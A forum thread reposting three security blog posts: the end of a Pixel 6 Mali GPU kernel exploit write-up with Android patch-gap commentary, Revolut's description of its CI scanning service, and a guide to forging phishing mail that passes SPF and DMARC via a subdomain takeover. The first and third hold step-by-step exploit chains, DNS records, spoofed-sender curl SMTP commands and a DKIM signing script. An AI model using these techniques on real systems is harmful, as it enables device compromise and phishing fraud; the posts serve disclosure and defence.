the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All these are valid as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased. 
If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store in this new region will be freed, but the extra mappings created in the aliased region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of having side effects that could result in a crash. The situation is now very similar to what I had in my previous post and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but readers who are interested can take a look at more details from the Section “Breaking out of the context” onwards in that post. To recap, I now have access to the backing pages in a kbase_va_region object that is already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used: int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages, struct tagged_addr *pages, bool partial_allowed) { ... /* Get pages from this pool */ while (nr_from_pool--) { p = kbase_mem_pool_remove_locked(pool); //<------- 1. ... } ... if (i != nr_4k_pages && pool->next_pool) { /* Allocate via next pool */ err = kbase_mem_pool_alloc_pages(pool->next_pool, //<----- 2. nr_4k_pages - i, pages + i, partial_allowed); ... } else { /* Get any remaining pages from kernel */ while (i != nr_4k_pages) { p = kbase_mem_alloc_page(pool); //<------- 3. ... } ... } ... } The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel). When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator. As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) 
As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, being able to write to PGD will allow me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution. In the following figure, the green block indicates the same page being reused as the PGD. To summarize, the exploit involves the following steps: Create JIT memory. Mark the JIT memory as evictable. Increase memory pressure by mapping memory to the user space via normal mmap system calls. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory. Create an alias region to the new GPU memory region that replaced the JIT memory so that the backing pages of the new GPU memory are shared with the alias region. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region is now replaced by the new memory region, this will cause kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6. will not be removed. The alias region can now be used to access the freed backing pages. Reuse the freed backing pages as PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages to the GPU address space. Map kernel code to the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux. The exploit for Pixel 6 can be found here with some setup notes. Disclosure and patch gapping At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident. There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn’t get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020, and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016 with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021. 
To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it’s too late. This again shows the importance of properly addressing security issues and recording them by assigning a CVE-ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see having security vulnerabilities in their products as a damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be. While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend. On March 7th, 2022, CVE-2022-0847 (Dirty pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February, 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022 and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel. Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186 that I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June and a Pixel 6 running the May patch was still affected. Taking a look at security issues reported by Google’s Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proof of concepts, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022, (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID) after Project zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022. In all of these instances, the bugs were only patched in Android a couple months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it’s still easy to pwn Android with N-days entirely. Well, yes, entirely. 
Notes

Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the openings to the Asterix series, which usually start with: "The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…"

Sursa: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
  15. Krzysztof Pranczk
Jan 3

Security Drone: Scaling Continuous Security at Revolut

Intro

As we're continuously growing and extending our product offerings, we face many technological challenges. These challenges are solved by our engineers, and this results in many features, changes and updates being developed and successfully delivered to our customers. However, with the development of new features come many security challenges that are faced by the internal Application Security Team. This lovely bunch is responsible for the security assurance of every new feature developed by our engineers. To provide the highest level of security assurance to our products, we've implemented a number of processes placed in different stages of the Software Development Life Cycle (SDLC), including automated scans in our CI/CD pipelines. However, it wouldn't be possible to efficiently triage every security finding produced by automated scanners. In July 2022, there were nearly 39,000 commits created by over 900 authors! To address this challenge, we developed Security Drone. In this article, we'd like to share with you our approach to providing the highest security assurance in fast CI/CD environments.

Challenges faced by Revolut

The classic approach to security testing requires the security teams to perform a manual review of any developed features, with the help of automated security scans. Traditionally, this work was executed on a risk and priority basis, and that need was stretching the team beyond its capacity. Additionally, the team had to cope with the numerous CI pipelines across the company. This approach wasn't a viable solution in terms of scaling, quality and coverage. Some of you may have an idea of the security challenges faced in a fast CI/CD environment. If not, let us make a little recap of the challenges we've been facing:

• Software changes are constantly increasing
• New changes are integrated and deployed every day
• Engineers tend to prioritise the development of functionalities over security
• The internal application security team can't be big enough to have a dedicated security engineer for each project — both internal and external
• AppSec teams nowadays must work on automating the work they were doing 10 years ago in a manual way
• With more tools integrated into the pipelines, the timeline of each job increases, which negatively affects the development experience
• And many more challenges you probably observe in your companies too!

First solution — The classic approach to CI/CD pipeline scans

Our first solution, and the most simplistic one, was to onboard automated security scanners like Static Application Security Testing (SAST) and Software Composition Analysis (SCA) and review the findings within the AppSec team. It worked, but we started facing another problem: the company was growing, and from an initial handful of projects, we now had to deal with thousands of projects and non-stop builds at any given time. As a result, we had to manage hundreds of CI pipelines used for security purposes. Let's see some numbers of what we observed in our environment. In every 24 hours of a working day there were about 950 new pull requests (PRs), with nearly 1.85 commits per PR. During working hours, automated scans were executed 3–4 times per minute, on average, against various projects. The chart below presents how many security scans were performed on the 14th of July 2022, every 30 minutes.
Number of automated security scans per 30 minutes

With those numbers, we faced another challenge — triaging all of the security findings. These scans produced a high number of false positive vulnerabilities that had to be manually triaged by the security team. Initially, we didn't think scanning every software change was the way to go — we thought we should only be scanning the changes intended for the Production environment. We did the analysis and concluded that about 81% of the commits had the main branch as their final destination, so we were facing the same challenge. Our scanners would be completing at least three successful security scans on a software change every minute! This amount of scans would still result in a potentially high number of false positives, which had to be reviewed and triaged within a certain period of time. Not only that, but more and more security scanners within CI/CD pipelines would affect their timelines negatively.

So we thought: 'Do we really have to go in this direction? Do we have to manage all of the pipelines for various projects and triage all of the identified security issues within the AppSec Team? Do we have to affect CI/CD timelines negatively?' At this point, we had a lot of doubts and questions about this approach. In the Application Security team we understood this approach wouldn't be scalable in a fast-paced environment such as Revolut. We could implement some small improvements to address each of these questions. However, those improvements would just delay bigger problems for later on. At this point, we decided to go in a slightly different direction, with a security-shift-left approach in mind. Security static analysis tools can easily be shifted left to an earlier phase in the SDLC, since these types of tools don't require the application to be running.

Second solution — Security Drone

You may expect something extremely smart and well-designed as a second solution. So did we. But it didn't take long for us to take an agile approach with lean implementations. We also started shifting security left and communicating security issues to developers as early as possible, before going into testing or production environments. At the beginning of our MVP solution, we decided to scan code changes during the pull request phase. In our opinion, it was a natural step for engineers to propose software changes for their colleagues to approve. At this point, we also decided to communicate all of the identified security findings to developers. The scanner's results could be taken into account during code review, which is an integral part of the development process in Revolut. It should be noted that our scanner was triggered when a new PR was created or when code was updated in an already existing PR. We also decided to place Security Drone in a Kubernetes cluster to scan the code independently from CI/CD pipelines and to have centralised scan management. In many cases, independent scans were able to deliver results to developers before the CI jobs had finished. Initially, we implemented only a SAST scanner to make the process as fast as possible and quickly deliver results to developers. We aimed to provide results in under 300 seconds. We carefully researched available SAST solutions to choose the most suitable one for our needs. It had to be fast, well-documented and allow us to write custom rules to identify potential security issues specific to our environment.
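The trigger-and-scan flow described above — a scan kicked off when a PR is opened or updated, running outside the CI pipeline — can be pictured with a minimal sketch. This is not Revolut's implementation; the webhook endpoint, payload fields and rule path are assumptions made purely for illustration (Flask and the Semgrep CLI are used as stand-ins):

# Sketch: receive a pull-request webhook and run a SAST scan outside the CI pipeline.
# Payload fields, endpoint and rule path are illustrative assumptions.
import json
import subprocess
import tempfile

from flask import Flask, request

app = Flask(__name__)

def run_sast_scan(repo_url: str, commit_sha: str) -> dict:
    """Clone the pushed revision and run Semgrep, returning its JSON findings."""
    with tempfile.TemporaryDirectory() as workdir:
        subprocess.run(["git", "clone", repo_url, workdir], check=True)
        subprocess.run(["git", "-C", workdir, "checkout", commit_sha], check=True)
        result = subprocess.run(
            ["semgrep", "--config", "rules/", "--json", workdir],
            capture_output=True, text=True,
        )
        return json.loads(result.stdout or "{}")

@app.route("/webhook/pull-request", methods=["POST"])
def on_pull_request():
    event = request.get_json(force=True)
    findings = run_sast_scan(event["repo_url"], event["head_sha"])
    # A real deployment would post the findings back to the PR as comments/checks.
    return {"finding_count": len(findings.get("results", []))}

Running such a service as its own deployment (for example in a Kubernetes cluster behind the VCS webhook) is what decouples scan latency from CI job duration and lets results reach the PR before the CI jobs finish.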
Last but not least, we wanted to achieve the lowest possible false positive rate to avoid producing irrelevant findings and to limit the amount of manual work that we had to cope with during triaging. Not only that: as we had decided to communicate all of the identified security findings to developers on the PR page, we had to make sure not to affect their experience negatively by making them review a number of irrelevant findings. Later, we started implementing new scanners in Security Drone, such as Software Composition Analysis and Infrastructure as Code, to bring more value to the automated security testing. Security Drone's high-level architecture is presented below.

Architecture of Security Drone

Currently, we scan all pull requests created by Revolut engineers. In July, Security Drone performed over 39,000 scans. The median scanning time is below 112 seconds and the average is below 110 seconds. Initially, we used 19 SAST and 63 IaC rules. Only high and critical SCA issues were directly reported to our developers. Our first MVP was released in Q1 2022 and has been extended and adjusted over the last months. Now, Security Drone has been operating in production for the last eight months without issues on both the operational and engineering distribution sides.

We use the following tools in Security Drone:

• Semgrep — Static Application Security Testing
• Snyk Open Source — Software Composition Analysis
• Checkov — Infrastructure as Code

What have we achieved with Security Drone?

• We have adopted a shift-left approach to security to identify and communicate security findings earlier in the SDLC, before going into testing or production environments
• Security issues can be fixed before going into production, and as a result, they don't have to be manually triaged by AppSec Team members
• Only merged security issues are reported to the AppSec Team to triage and loop into the vulnerability lifecycle process
• We lowered the false positive rate by carefully choosing the SAST solution and continually tuning the rules. We were able to achieve a ~3.8% FP rate!
• Our centrally managed scanner currently scans 100% of the code in Revolut, which saves us hundreds of hours of manual reviews. Here are some numbers from the last 24 hours: nearly 1700 pull requests were scanned, and over 3900 scans associated with the above PRs were performed
• Ability to find new vulnerabilities in other applications based on patterns
• The scans are fast and don't disrupt the developer experience. They're executed in parallel (a rough sketch of such parallel execution follows after this section), and the median scanning time is 11 seconds for SAST, 22 seconds for IaC and 101 seconds for SCA
• Increased security awareness and continuous learning amongst engineers. They're also aware of the direction that AppSec is moving in

What is next?

Security Drone will always be under development, as new technologies are emerging and improvements to the development experience can be made. On our roadmap we have various points, some of which include:

• Ability to flag findings as false positives in a developer-friendly way
• Incremental SAST scans — scan only code changes in PRs
• Integration of more security scanners and the development of more SAST/IaC rules

Keep your eyes peeled for our next blog post around Application Security in Revolut, as we may share more interesting tools and guides on how we solve the challenges we face every day.
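As a footnote to the tooling above, the parallel execution of the three scanners can be sketched roughly as follows. The CLI flags are simplified assumptions (a real integration would consume each tool's JSON report); the point is only that the slowest scanner, not the sum of all three, bounds the total scan time:

# Sketch: run the SAST, SCA and IaC scanners in parallel and time each one.
# Flags are simplified assumptions; output parsing is omitted.
import subprocess
import time
from concurrent.futures import ThreadPoolExecutor

SCANNERS = {
    "sast (semgrep)": ["semgrep", "--config", "rules/", "--json", "."],
    "sca (snyk)":     ["snyk", "test", "--json"],
    "iac (checkov)":  ["checkov", "-d", ".", "-o", "json"],
}

def run_scanner(name, cmd):
    start = time.monotonic()
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return name, time.monotonic() - start, proc.returncode

with ThreadPoolExecutor(max_workers=len(SCANNERS)) as pool:
    for name, seconds, code in pool.map(lambda item: run_scanner(*item), SCANNERS.items()):
        print(f"{name}: {seconds:.1f}s (exit code {code})")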
Credits

Credits go to every Revolut AppSec engineer involved in the design and development of Security Drone, especially: Arsalan Ghazi, Krzysztof Pranczk, Pedro Moura, Roger Norton

Sursa: https://medium.com/revolut/security-drone-scaling-continuous-security-at-revolut-862bcd55956e
  16. DMARC Identifier Alignment: relax, don't do it, when you want to go to it
Jan 25, 2023 in HACKING • MAILSECURITY
dmarc spf dkim
9 min read

From subdomain takeover to phishing mails

TL;DR: if you have a subdomain takeover for a given domain, and default DMARC alignment settings, you can create emails that pass SPF and DMARC for phishing purposes. DKIM, however, cannot be passed for the domain, but a trick is possible to make emails look more trustworthy.

Introduction

I like Mozilla's definition of a subdomain takeover:

"A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn't been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it."

The usual impact of the above is phishing or cookie theft from impersonated web pages. Subdomain takeovers have consequences in mail security too, and not just on the vulnerable subdomain but also on the organizational one. This article is a practical example of how to craft phishing emails from a subdomain takeover.

Prerequisites

Vulnerable subdomain

One needs a subdomain takeover where the target of a DNS record is fully under his control. E.g. for a vulnerable domain of altf8.fr (I own it), a DNS CNAME record as follows is needed:

takeover IN CNAME sub.dangling.com.

$ dig +short takeover.altf8.fr
sub.dangling.com.

where dangling.com is not registered (anymore). One can then claim the dangling.com domain and control its DNS zone, hence making sub.dangling.com point to a controlled server. The above is important, as a subdomain takeover pointing to third-party websites such as GitHub etc. will not allow an attacker control over a DNS zone or a server, which is crucial for the technique described here to work.

"Relaxed" DMARC configuration

The DMARC configuration of the target domain needs to allow the "relaxed" mode of SPF Authenticated Identifiers and/or DKIM Authenticated Identifiers. This, though, is the default behaviour if the aspf or adkim settings have not been set. Hence, the following DMARC policy is vulnerable:

$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject"

So would be this one:

$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject; aspf=r; adkim=r"

But that one is not:

$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject; aspf=s; adkim=s"

For the following demonstration, the first policy above was in use.

Preparation

Let's set some DNS records on the dangling.com domain that we registered and control.

The subdomain takeover:

sub IN CNAME server.dangling.com

server.dangling.com is identified by:

server IN A 1.2.3.4

MX record for the controlled server:

target IN MX 10 server.dangling.com

So now, takeover.altf8.fr points to the controlled server, which is allowed to send mails for sub.dangling.com:

$ dig +short takeover.altf8.fr
sub.dangling.com.
1.2.3.4

$ dig +short mx takeover.altf8.fr
sub.dangling.com.
10 server.dangling.com.

Passing SPF

The SPF Authenticated Identifiers definition states:

"In relaxed mode, the SPF-authenticated domain and RFC5322.From domain must have the same Organizational Domain. In strict mode, only an exact DNS domain match is considered to produce Identifier Alignment."
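Whether a target domain actually meets the relaxed-alignment prerequisite can be checked quickly before going any further. Below is a minimal sketch (dnspython is an assumption — any DNS library works) that fetches the _dmarc TXT record and reports the effective aspf/adkim modes, which default to relaxed ("r") when the tags are absent:

# Sketch: report a domain's effective DMARC alignment modes (missing tags default to "r").
# Uses dnspython; the domain below is just the demo domain from this article.
import dns.resolver

def dmarc_alignment(domain: str) -> dict:
    answers = dns.resolver.resolve(f"_dmarc.{domain}", "TXT")
    records = [b"".join(rr.strings).decode() for rr in answers]
    record = next(r for r in records if r.startswith("v=DMARC1"))
    tags = dict(
        part.strip().split("=", 1) for part in record.split(";") if "=" in part
    )
    return {"aspf": tags.get("aspf", "r"), "adkim": tags.get("adkim", "r")}

print(dmarc_alignment("altf8.fr"))  # e.g. {'aspf': 'r', 'adkim': 'r'} -> both relaxed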
The "SPF-authenticated domain" is taken from the SMTP MAIL FROM command. The From domain is taken from the MIME header with the same name. When a mail is received, the MAIL FROM domain value is extracted and the corresponding SPF record is requested and then used. This is the behaviour of most mail agents. If relaxed mode is enabled, one can send a subdomain in MAIL FROM and a domain in From with the same organizational domain, and SPF will still pass:

"For example, if a message passes an SPF check with an RFC5321.MailFrom domain of "cbg.bounces.altf8.fr", and the address portion of the RFC5322.From field contains "payments@altf8.fr", the Authenticated RFC5321.MailFrom domain identifier and the RFC5322.From domain are considered to be "in alignment" in relaxed mode, but not in strict mode."

In our example, we control the SPF record for sub.dangling.com. We set it to:

sub IN TXT "v=spf1 mx -all"

Which means "all IPs associated with MX records in the sub.dangling.com domain will be authorized to send mails". Because of the subdomain takeover and how DNS resolution works, we now have an SPF record for takeover.altf8.fr:

$ dig +short txt takeover.altf8.fr | grep spf
"v=spf1 mx -all"

And because we set server.dangling.com as a valid MX, we can now send emails from it. We can do that on the command line of server.dangling.com (altf8.fr uses Microsoft 365, hence the outlook.com SMTP server below):

$ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt
[...]
* TCP_NODELAY set
* Expire in 149967 ms for 3 (transfer 0x55aad3f5a0f0)
* Expire in 200 ms for 4 (transfer 0x55aad3f5a0f0)
* Connected to altf8-fr.mail.protection.outlook.com (104.47.24.36) port 25 (#0)
< 220 PR2FRA01FT014.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 23 Jan 2023 15:55:16 +0000
> EHLO mail.txt
< 250-PR2FRA01FT014.mail.protection.outlook.com Hello [1.2.3.4]
< 250-SIZE 157286400
< 250-PIPELINING
< 250-DSN
< 250-ENHANCEDSTATUSCODES
< 250-STARTTLS
< 250-8BITMIME
< 250-BINARYMIME
< 250-CHUNKING
< 250 SMTPUTF8
> MAIL FROM:<ceo@takeover.altf8.fr> SIZE=140
< 250 2.1.0 Sender OK
> RCPT TO:<jbencteux@altf8.fr>
< 250 2.1.5 Recipient OK
> DATA
< 354 Start mail input; end with <CRLF>.<CRLF>
} [140 bytes data]
* We are completely uploaded and fine
100   140    0     0  100   140      0    185 --:--:-- --:--:-- --:--:--   185
< 250 2.6.0 <b427960e-4306-42a2-9121-fefaaa105def@PR2FRA01FT014.eop-fra01.prod.protection.outlook.com> [InternalId=68521908309720, Hostname=MRZP264MB2425.FRAP264.PROD.OUTLOOK.COM] 8276 bytes in 0.036, 220.364 KB/sec Queued mail for delivery
100   140    0     0  100   140      0    185 --:--:-- --:--:-- --:--:--   185
* Connection #0 to host altf8-fr.mail.protection.outlook.com left intact

This is the content of mail.txt:

From: ceo@altf8.fr
To: jbencteux@altf8.fr
Subject: You are fired

Hi Jeff,

Sorry to tell you this way, but you're out.

Best regards,
CEO

Note the difference between the sender in --mail-from and the one in the From header of mail.txt, which is what the RFC states is allowed when relaxed SPF alignment is in use.
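The same envelope/header mismatch can be reproduced with Python's standard smtplib instead of curl. This is a hedged sketch reusing the demo values from above; from_addr sets the SMTP MAIL FROM (the RFC5321.MailFrom identity that SPF is evaluated against), while the From header inside the message stays on the parent domain:

# Sketch: envelope sender on the taken-over subdomain, header From on the parent domain.
import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "ceo@altf8.fr"          # RFC5322.From shown to the recipient
msg["To"] = "jbencteux@altf8.fr"
msg["Subject"] = "You are fired"
msg.set_content("Hi Jeff,\n\nSorry to tell you this way, but you're out.\n\nBest regards,\nCEO")

with smtplib.SMTP("altf8-fr.mail.protection.outlook.com", 25) as smtp:
    # from_addr becomes the SMTP MAIL FROM (RFC5321.MailFrom), which SPF checks.
    smtp.send_message(msg, from_addr="ceo@takeover.altf8.fr", to_addrs=["jbencteux@altf8.fr"])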
The email is received in the Outlook inbox of jbencteux@altf8.fr, passing the spam filters. Its MIME headers state that SPF passes:

Received-SPF: Pass (protection.outlook.com: domain of takeover.altf8.fr designates 1.2.3.4 as permitted sender)

Note that DMARC passes as well:

Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100

This is because if no DKIM is present (dkim=none) but SPF passes, then DMARC passes. This is a by-design property of DMARC.

OK, cool, but the mail is not cryptographically signed, and other mail agents might put it in the spam folder for lack of a signature, so let's see if we can get DKIM working.

(Kind of) Passing DKIM

Just as SPF Authenticated Identifiers exist, there are DKIM Authenticated Identifiers:

"In relaxed mode, the Organizational Domains of both the [DKIM]-authenticated signing domain (taken from the value of the "d=" tag in the signature) and that of the RFC5322.From domain must be equal if the identifiers are to be considered aligned. In strict mode, only an exact match between both of the Fully Qualified Domain Names (FQDNs) is considered to produce Identifier Alignment."

Which means that if DMARC contains adkim=r (or no adkim at all, as r is the default value), there could be a d=takeover.altf8.fr in the DKIM signature and a From sender ending in @altf8.fr, and DKIM would still pass. Let's try that.

Generate a private key for DKIM signing on server.dangling.com:

$ openssl genrsa -out dkim_priv.pem 2048

Get the corresponding public key in base64:

$ openssl rsa -in dkim_priv.pem -pubout -outform der 2>/dev/null | openssl base64 -A
Ayw[...]zkwA

Construct and publish a DKIM record with the obtained public key on our dangling.com DNS zone (s1 is taken as an arbitrary selector):

s1._domainkey IN TXT "v=DKIM1; k=rsa; p=Ayw[...]zkwA"

$ dig +short txt s1._domainkey.sub.dangling.com
"v=DKIM1; k=rsa; p=Ayw[...]zkwA"

Sign a mail with the private key, using the following Python script based on dkimpy:

import dkim

mail = open("mail.txt", "rb").read()
selector = b"s1"
domain = b"takeover.altf8.fr"
privkey = open("dkim_priv.pem", "rb").read()

signature = dkim.sign(mail, selector, domain, privkey)
print(signature.decode("utf-8"))

It gives the following signature, which we add to mail.txt:

$ ./dkim_sign.py
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=takeover.altf8.fr;
 i=@takeover.altf8.fr; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from;
 bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=;
 b=eV4zAv9pVlDFmFN3DIYBX+hSRq/t4wyXCHbuyEB7GmWha3O8n1rxSyzyn1j15OREU
 uy6erbTUck2[...]3YxVk/ejgidpedmYoSnl8VChsmXZFsmMeMuuujALo4H1iIG
 8EhOesBGxeylmHZI5hGapmzReVyjTyyvoQQP9ymRRAT0uyV3Dej+cxDZ7AVfC7fdzW
 YFlcH69vbTryw==

We then send the signed mail:

curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt

And the result of the email authentication is as follows:

Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=fail (no key for signature) header.d=takeover.altf8.fr;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100

It fails because the mail agent tries to get a DKIM public key DNS record for s1._domainkey.takeover.altf8.fr, and that resolves to… nothing.
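Before looking at why, the failure is easy to confirm with two DNS lookups: the selector record only exists under the attacker-controlled zone, not under the vulnerable subdomain. A small sketch (dnspython assumed):

# Sketch: the DKIM selector resolves under sub.dangling.com but not under takeover.altf8.fr.
import dns.resolver

for name in ("s1._domainkey.takeover.altf8.fr", "s1._domainkey.sub.dangling.com"):
    try:
        answer = dns.resolver.resolve(name, "TXT")
        print(name, "->", b"".join(answer[0].strings).decode()[:40] + "...")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        print(name, "-> no record")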
It does not automatically point to s1._domainkey.sub.dangling.com, so the DNS response is empty — hence the "no key for signature". This means (AFAIK) there is no valid altf8.fr DKIM signature that can be generated from a subdomain takeover. One would need control over *.altf8.fr to make it possible.

However, as a hackish way of improving how the mail looks, it is still possible to sign it for another domain to try to pass more antispam defences, even if that domain is not our targeted altf8.fr domain (marketing platforms sign mails for other domains all the time). We can take the subdomain sub.dangling.com as an example. If we reuse our script to sign the mail with sub.dangling.com:

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=sub.dangling.com;
 i=@sub.dangling.com; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from;
 bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=;
 b=gdRYJ8lajpHd4DZfbqOLNtvaqH+tSsbyTM2o3Px3EuTEcAFO6wTe+eLKzQWAiZ6CiNg0l
 udHoSAd9XJfkjBuP[...]V4Hlg02qSoNmNZOiA/Oj3g53eTf+uoNQdAHT/qjEVBeAN0S
 hzrmGnN8B8cynWNSIVOw9Pwmqj2nmPTzEYDhJOE7aIiIrlJz59/rhQFUBYrA==

curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt

We then get a passing DKIM:

Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=pass (signature was verified) header.d=sub.dangling.com;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100

While this will not fool spam filters that check whether the signing domain is the sender domain (which they should), it is sometimes enough for the mail to be signed by any domain to pass misconfigured defences. Our mail is now:

- Passing SPF
- Passing DMARC
- Passing DKIM, but not for the sender's domain

This can trick a lot of mail clients into believing this email is legit, including Outlook, the one tested for this example.

Conclusion

While the prerequisites for this type of attack are demanding, it is not unlikely that attackers will use subdomain takeovers in order to be able to forge convincing phishing emails. This could also be a good tactic from a red team point of view, as it minimizes the interaction between the targeted domain and the operator (only a few DNS requests are needed) until the final phishing mail is sent.

To avoid and mitigate this issue, I suggest:

- Regularly checking your DNS for unused records and removing them to avoid subdomain takeovers
- If DMARC relaxed modes are not needed, setting the following in your DMARC DNS records: aspf=s; adkim=s;

References

RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1 (rfc-editor.org)
